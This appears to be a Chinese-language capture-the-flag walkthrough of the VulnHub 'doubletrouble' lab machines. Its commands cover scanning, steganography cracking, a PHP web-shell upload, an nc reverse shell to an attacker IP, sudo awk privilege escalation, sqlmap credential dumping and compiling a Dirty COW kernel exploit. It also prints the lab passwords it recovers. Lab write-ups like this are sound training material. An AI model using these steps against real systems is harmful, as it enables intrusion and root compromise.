一.环境搭建
1.靶场描述
get flagsdifficulty: easyabout vm: tested and exported from virtualbox. dhcp and nested vtx/amdv enabled. you can contact me by email for troubleshooting or questions.This works better with VirtualBox rather than VMware
2.下载地址
https://www.vulnhub.com/entry/doubletrouble-1,743/
3.启动靶场
虚拟机开启之后界面如上,我们不知道ip,需要自己探活,网段知道:192.168.1.0/24
二.渗透测试
1.目标
目标就是我们搭建的靶场,靶场IP为:192.168.1.0/24
2.信息收集
(1)寻找靶场真实ip
nmap -sP 192.168.1.0/24
arp-scan -l
靶场IP地址为:192.168.1.11
(2)探测端口及服务
nmap -p- -sV 192.168.1.11
发现开启了22端口, OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)发现开启了80端口, Apache httpd 2.4.38 ((Debian))
(3)web指纹识别
whatweb -v 192.168.1.11
扫描到框架是qdPM
3.渗透测试
(1)访问web服务
http://192.168.1.11
我们可以看到是qdPM
(2)扫描web服务
1)棱洞3.0指纹识别
./EHole_linux_amd64 finger -u http://192.168.1.11
2)nikto扫描网站结构
nikto -h http://192.168.1.11
我们扫描到3个目录,我们一个一个进行访问
http://192.168.1.11/images
没有任何有用的信息
http://192.168.1.11/secret
扫描到一个图片,我们先保存下来
http://192.168.1.11/template
3)dirsearch目录扫描
dirsearch -u 192.168.1.11 -e * -x 403 --random-agent
目前,我们掌握的信息是一个qdPM9.1框架和一张图片。
(3)渗透测试
1)查找漏洞
我们使用msf查找漏洞,查找到一个漏洞,但是需要密码,这个办法行不通。
我们使用kali进行查找漏洞,但是漏洞需要密码,还是不行。
2)图片隐写
我们想到前面有一个图片,我们进行查看
使用steghide工具先查看一下图片基本信息,但是需要密码,我们没有密码
steghide --info '/home/kali/桌面/doubletrouble.jpg'
我们使用stegseek进行爆破
stegseek--crack '/home/kali/桌面/doubletrouble.jpg'
看到账号密码,尝试登录
我们看到登录成功
3)文件上传
我们进行查找,看有没有可以利用的地方,发现这里有上传点
我们上传一句话木马,连接蚁剑
我们可以看到连接成功
http://192.168.1.11/uploads/users/197129-MS02423.php
4)反弹shell
nc -e /bin/bash 192.168.1.9 5555
5)提权
使用sudo -l查看该用户是否具有sudo权限,发现awk可以
发现awk可以进行无密码使用sudo操作
sudo awk 'BEGIN {system("/bin/bash")}'
我们进入root查看,发现没有flag,有一个镜像,我们下载下来
我们把靶机复制到uploads目录下
cp doubletrouble.ova /var/www/html/uploads
因为这个镜像我之前就下载下来了,所以这里我们不用探测ip地址了,ip地址为192.168.1.15
三.第二个镜像
我们知道ip地址为192.168.1.15,前面的步骤和第一个是一样的,这里我就进行简写
1.探测端口及服务
发现开启了22端口, OpenSSH 6.0p1 Debian 4+deb7u4 (protocol 2.0)发现开启了80端口, Apache httpd 2.2.22 ((Debian))
2.访问web服务
http://192.168.1.15
我们看到是一个登录页面,一般登录页面要么爆破,要么进行测试SQL注入,这个只能进行SQL注入。
3.SQL注入
(1)测试是否存在SQL注入
首先我们进行抓包
发现存在SQL注入
(2)爆破数据
sqlmap -r '/home/kali/Desktop/MS02423.txt' --dbs --batch
sqlmap -r '/home/kali/Desktop/MS02423.txt' -D 'doubletrouble' --tables --batch
sqlmap -r '/home/kali/Desktop/MS02423.txt' -D 'doubletrouble' -T 'users' --columns --batch
sqlmap -r '/home/kali/Desktop/MS02423.txt' -D 'doubletrouble' -T 'users' -C 'username,password' --batch --dump
最后我们爆破出来2个用户名和密码
montreux GfsZxc1clapton ZubZub99
(3)ssh登录
我们使用2个用户名和密码进行登录,发现页面登录不了
前面扫描端口的时候,发现22端口是开放的,我们进行登录试试
我们发现montreux登录不了,但是clapton可以
我们得到了第一个flag
(4)提权
我们使用sudo -l查看,显示不存在
我们查看内核版本,查找漏洞
uname -a
查看下系统内核版本信息,发现存在脏牛漏洞,内核版本:3.2.0-4-amd64。
searchsploit linux 3.2searchsploit -m 40616.c 下载
我们进行查看40616.c内容, 先使用gcc连接,然后直接使用,后面不用跟其他命令
使用nc传输,将40616.c传输到clapton系统中
在clapton的shell中启动nc接收nc -lvnp 10086 > 40616.c
在kali中使用nc上传40616.cnc 192.168.1.15 10086 < 40616.c -w 1
我们可以看到传输成功了
我们可以看到40616.c没有执行权限,我们加权限
chmod777 40616.c
gcc连接,生成可执行程序,进行执行
gcc 40616.c -o 40616.c -pthread./40616.c
我们可以看到提权成功,查看flag
三.相关资源
1.靶场下载地址
2.nmap
3.arp-scan
4.masscan
5.[ 常用工具篇 ] 渗透神器 whatweb 安装使用详解
6.[ 渗透工具篇 ] EHole(棱洞)3.0安装部署及详解(linux & win)
7.nikto工具的使用
8.dirsearch目录扫描
9.图片隐写
10.文件上传
11.反弹shell
12.SQL注入
13.ssh登录
14.脏牛漏洞
15.gcc